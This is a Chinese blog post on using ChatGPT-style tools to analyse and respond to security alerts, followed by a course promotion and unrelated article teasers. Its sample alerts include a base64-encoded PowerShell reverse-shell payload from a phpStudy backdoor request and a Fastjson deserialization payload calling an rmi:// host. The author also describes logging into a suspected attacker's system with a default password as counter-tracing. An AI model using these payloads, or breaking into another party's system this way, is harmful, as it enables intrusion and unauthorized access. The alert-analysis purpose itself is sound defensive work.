智能驱动|ChatGPT视角下的告警事件闭环响应

背景

在人工智能技术浪潮发展驱动的背景下,数字化、智能化、多元化的网络安全格局逐渐形成。在这个时代如何有效利用好智能工具,促进工作有效开展,显得极为重要。很多安全企业也在大力发展GPT机器人从而实现数据智能化应用,发挥其最佳价值。

 

ChatGPT视角

思考一个事物的生命周期,从0到1到0的完整过程。

那么,一个告警事件如何完整分析及闭环处置?看chatgpt怎么回答,从其思考发现已经很全面,后续的分析也将基于此视角和思路进行。

问答bing

1711875785_660926c9e2d123d78b2f2.png!small?1711875787567

问答gemini.google

1711875831_660926f7c2383787c5d28.png!small?1711875832210

告警事件分析

告警事件的数据来源有多样,目前很多安全检测产品,如防火墙、WAF、IPS、IDS、NDR等,通过检测规则、语义分析、机器学习、安全模型等可以产生。

根据Chatgpt的视角输出简单流程图如下,总体上分为三个过程两个方向(定向、定论、定决,误报与非误报),现在这种分析思路已经运用于安全运营SOAR(安全编排自动化与响应系统)等。

1711875976_66092788b842602a01d93.png!small?1711875977257

对话案例

借助Chatgpt对攻击数据进行研判分析,目前从分析效果来看,对安全人员技术要求不是太高,可以简化很多人工参与分析数据的过程,能更简洁快速的输出结果。

1.phpStudy后门远程代码执行漏洞为例

请详细判断这个请求数据是否存在攻击行为?
GET /l.php HTTP/1.1
Host: 172.17.149.123:8080
User-Agent: Go-http-client/1.1
Accept-Charset: c3lzdGVtKCdwb3dlcnNoZWxsIC1ub3AgLWMgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJzEwLjIxMS41NS43JywxMjM3Nyk7JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsICRieXRlcy5MZW5ndGgpKSAtbmUgMCl7OyRkYXRhID0gKE5ldy1PYmplY3QgLVR5cGVOYW1lIFN5c3RlbS5UZXh0LkFTQ0lJRW5jb2RpbmcpLkdldFN0cmluZygkYnl0ZXMsMCwgJGkpOyRzZW5kYmFjayA9IChpZXggJGRhdGEgMj4mMSB8IE91dC1TdHJpbmcgKTskc2VuZGJhY2syID0gJHNlbmRiYWNrICsgJ1BTICcgKyAocHdkKS5QYXRoICsgJz4gJzskc2VuZGJ5dGUgPSAoW3RleHQuZW5jb2RpbmddOjpBU0NJSSkuR2V0Qnl0ZXMoJHNlbmRiYWNrMik7JHN0cmVhbS5Xcml0ZSgkc2VuZGJ5dGUsMCwkc2VuZGJ5dGUuTGVuZ3RoKTskc3RyZWFtLkZsdXNoKCl9OyRjbGllbnQuQ2xvc2UoKSInKTtwcmludGYoJ15eXicpOw==
Accept-Encoding: gzip,deflate

1711876095_660927ffa9131c58ef9a3.png!small?1711876096460

可以看到对数据进行了base64解码,分析了代码用途。

2.Fastjson 1.2.24反序列化漏洞攻击漏洞为例

请详细判断这个响应数据是否存在攻击行为?
POST /TF0gcDr5qO6R/index.php?fetch=2 HTTP/1.1
Host: 10.211.55.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 698
Connection: close
Cookie: PHPSESSID=15d8h6bqumo7d4geih3f5lafk3
{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://9g.aa3v3hv1.ul5yv9.dnslog.cn/miao2","autoCommit":true}}

1711876247_6609289721d58db91ff03.png!small?1711876247819

可以看到对请求数据进行了解码,分析了代码用途。

解码后源代码如下

{"name":{"type":"java.lang.Class","val":"java.lang.String"},"x":{"type":"com.sun.rowset.RowSetImpl","dataSourceName":"rmi://9g.aa3v3hv1.ul5yv9.dnslog.cn/miao2","autoCommit":true}}

通过上述两个案例的分析研判,使用问答的这种方式可以发现分析非常准确,大大降低了对告警分析门槛。

告警事件闭环响应

1.通过对安全运营中心安全告警事件浏览(①告警产生--定向),发现一个名为.sh文件下载请求的告警事件。(要分析那个告警)

1711876471_66092977ec5bde842e5b8.png!small?1711876472680

2.基于此.sh文件下载请求的告警事件,进行(②分析研判-定论),由于目前数据留存问题研判只能通过对攻击IP标签及检测规则特征辅助研判。如果有数据报内容可以借助Chatgpt进行分析研判。

1711876516_660929a4b15e6751c3626.png!small?1711876517214

3.通过对攻击者进行IP荣誉和历史威胁情报等查询,进一步②分析研判,发现情报标签恶意、资产测绘开发服务及端口、历史样本、网络情报披露等确认其存在攻击行为。

1711876542_660929bef3fe269d9b401.png!small?1711876543643

1711876556_660929cc16ca5ebcfb750.png!small?1711876556633

4.通过分析研判发现该告警事件不是误报,对于此可以进行两个方向的(③处置),一是,由于攻击没有成功是一个尝试行为可以直接进行黑名单封禁。二是,对于此攻击者可以进行溯源反制,如果造成数据泄露或者其他损失可进行报警处理。

对该攻击IP进行分析研判是,通过资产测绘发现开放5003端口,访问为资产灯塔系统。

1711876597_660929f5bc56457149394.png!small?1711876598659

对于此系统简单尝试一次弱口令admin/admin,发现成功登录。通过对该系统的策略设置进行一步确认研判分析正确,资产是华为云如果实名认证就可以定位到具体人。

1711876618_66092a0a91b7d77e9dd7a.png!small?1711876619164

总结思考

智能的工具可以极大的辅助安全从业人员在工作过程中高效处理问题,但是很多位置的思考还是不能完全自动智能化,需要人的参与才能完整进行。

人是安全建设核心点,工具能解决重复且无需深度思考的繁重工作,当然机器人的智能是在大量算法和数据不断训练和优化中成长进化,智能机器人未来可期........

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取 

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

同时每个成长路线对应的板块都有配套的视频提供: 

大厂面试题

视频配套资料&国内外网安书籍、文档

当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~ 

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)

特别声明:

此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/677908.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

深度学习笔记:1.anaconda安装

Download Anaconda Distribution | Anaconda 双击安装 设置环境变量 anaconda常用命令大全(保姆级别建议收藏)-CSDN博客https://blog.csdn.net/m0_64892604/article/details/128806043?ops_request_misc%257B%2522request%255Fid%2522%253A%252217174671831680018…

推荐ChatGPT4.0——Code Copilot辅助编程、Diagrams: Show Me绘制UML图、上传PDF并阅读分析

5月14日凌晨1点、太平洋时间的上午 10 点,OpenAI的GPT-4o的横空出世,再次巩固了其作为行业颠覆者的地位。GPT-4o的发布不仅仅是一个产品的揭晓,它更像是向世界宣告AI技术已迈入了一个全新的纪元,连OpenAI的领航者萨姆奥特曼也不禁…

图书管理系统(https://github.com/plusmultiply0/bookmanagesystem)

特意去github找了一个用flask框架的项目,一起来学习它吧 这个系统包括很多功能:用户权限管理模块(管理员和普通用户),注册登录模块(滑块验证码功能),图书有关信息模块(借…

Django使用正则表达式

本书1-7章样章及配套资源下载链接: https://pan.baidu.com/s/1OGmhHxEMf2ZdozkUnDkAkA?pwdnanc 源码、PPT课件、教学视频等,可以从前言给出的下载信息下载,大家可以评估一下。 在Django框架的新版本(v2.0 )中,URLc…

低比特大模型排行版暨AutoRoundV0.2发布

由于大量的量化模型没有精度数据,为了让用户更好地找到适配自己的模型或量化算法,最近推出了低比特大模型排行版,评估的指标主要涵盖10个zero shot的任务,如果有什么建议或者意见可以去社区提~目前支持13B以下模型的评估,后面可能…

2024专精特新趋势论坛,汉王友基分享数字化创新实践之路

5月31日,由深圳市中小企业服务局作为指导单位,36氪主办的“WISE新风向2024专精特新趋势论坛”在粤港澳大湾区顺利举办。 汉王友基作为国家级专精特新“小巨人”企业代表,受邀参加此次大会,企业CTO邓立明先生进行了《数字赋能&…

网易云音乐格式在线转换

应用分享:众所周知网易云下载的格式为 .NCM,只能在网易云音乐里播放。 今天提供在线转换为MP3格式 NCM TO MP3,无需安装,转换后就能在任意播放器使用。 使用地址: https://ncm.worthsee.com/ 网络研究观 数据泄露…

【力扣】矩阵中的最长递增路径

一、题目描述 二、解题思路 1、先求出以矩阵中的每个单元格为起点的最长递增路径 题目中说,对于每个单元格,你可以往上,下,左,右四个方向移动。那么以一个单元格为起点的最长递增路径就是:从该单元格往上…

PDF 文件的解析

1、文本 PDF 的解析 1.1、文本的提取 进行文本提取的 Python 库包括:pdfminer.six、PyMuPDF、PyPDF2 和 pdfplumber,效果最好的是 PyMuPDF,PyMuPDF 在进行文本提取时能够最大限度地保留 PDF 的阅读顺序,这对于双栏 PDF 文件的抽…

arduino 与 nodeMcu 之间的通信

一、前言 当在 arduino 板子处理好了传感器的数据应该发送给远程服务器这时候就需要用 nodeMcu 了,但是怎么把 arduino 的数据发送到 nodeMcu 呢,这就是本文要实现的。 两个板子之间通信很简单,直接使用 arduino IDE 提供的 Serial.println…

【C++】——list模拟实现(包懂的,细节满满)

前言 list的模拟实现和string和vector的有区别的,但是也有相同。 区别:list的迭代器底层和其他两个迭代器底层有很大区别,因为list的链式结构决定了与它们两个的不一样 相同:迭代器用法大致一样,其他成员函数的使用也…

解决Mac ~/.bash_profile 配置的环境变量重启终端后失效问题

在Mac系统中,配置环境变量通常是在~/.bash_profile文件中进行。然而,有时会遇到配置的环境变量在重启终端后失效的问题。 解决办法: 在~/.zshrc文件最后或最前面,增加一行 source ~/.bash_profile

Linux 搭建 ZeroTier 的 Moon 服务器

系统:centos 7.6 轻量云服务器:腾讯云 Moon是什么,为什么需要Moon? ZeroTier通过自己的多个根服务器帮助我们建立虚拟的局域网,让虚拟局域网内的各台设备可以打洞直连。这些根服务器的功能有些类似于通过域名查询找到…

SOFA-RPC学习记录

文章目录 需求分析模块划分微服务模块交互模块 可拓展架构插件机制 功能分析交互模块 学习微服务模块交互模块 dubbo与nacos集成学习Nacos配置中心实战 dubbo与apollo集成学习配置中心组件与k8s的抉择参考资料 结论 本报告旨在深入学习SOFA-RPC框架,特别是其动态配置…

基于小波区间相关的信号降噪方法(MATLAB 2021B)

在我们处理信号过程中最重要的任务就是找到信号隐藏的规律和信号的特征。常用的傅里叶分析法只能用于在时间域或者频率域上分析信号,而通常的数据会在时间域和频率域均有特征。而小波分析是继傅里叶分析之后的一大突破性创新,也是近年来在学术界非常热门…

python字符串的索引

上一篇回顾 上一关中,我们重识了 字符串,还了解了 字符串拼接 和 字符串格式化输出 的方法。 字符串的“乘法”可以很方便地“复读”字符串,让字符串与一个整数 n 相乘,字符串就会原样复制 n 次。 在体验课中我们学到&#xff…

嵌入式Linux系统编程 — 1.2 文件管理与错误处理

目录 1 Linux 系统如何管理文件 1.1 什么是静态文件 1.2 扇区(Sector)和块(Block)概念? 1.3 inode 1.4 进程控制块(PCB) 2 返回错误处理与 errno 2.1 errno变量介绍 2.3 perror函数介绍…

python-验证子串

题目描述 输入两个字符串,验证其中一个串是否为另一个串的子串。 输入两个字符串, 每个字符串占一行,长度不超过200且不含空格。 输出 若第一个串s1是第二个串s2的子串,则输出(s1) is substring of(s2)否则,若第二个串…

【云原生】kubernetes中secret原理详解与应用实战

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯,先赞后看哦~🎈🎈 🏆 作者简介:景天科技苑 🏆《头衔》:大厂架构师,华为云开发者社区专家博主,…

LayUI的暗淡:错误的押宝了前后端不分离

LayUI是一个不错的中后台UI框架,贝格前端工场用的CMS就是基于layUI的,可以说简单轻便。除此之外,贝格前端工场很少接到客户要求升级LayUI界面,或者采用LayUI框架的。 一、LayUI官网的谢幕,吹起了前后端不分离模式没落…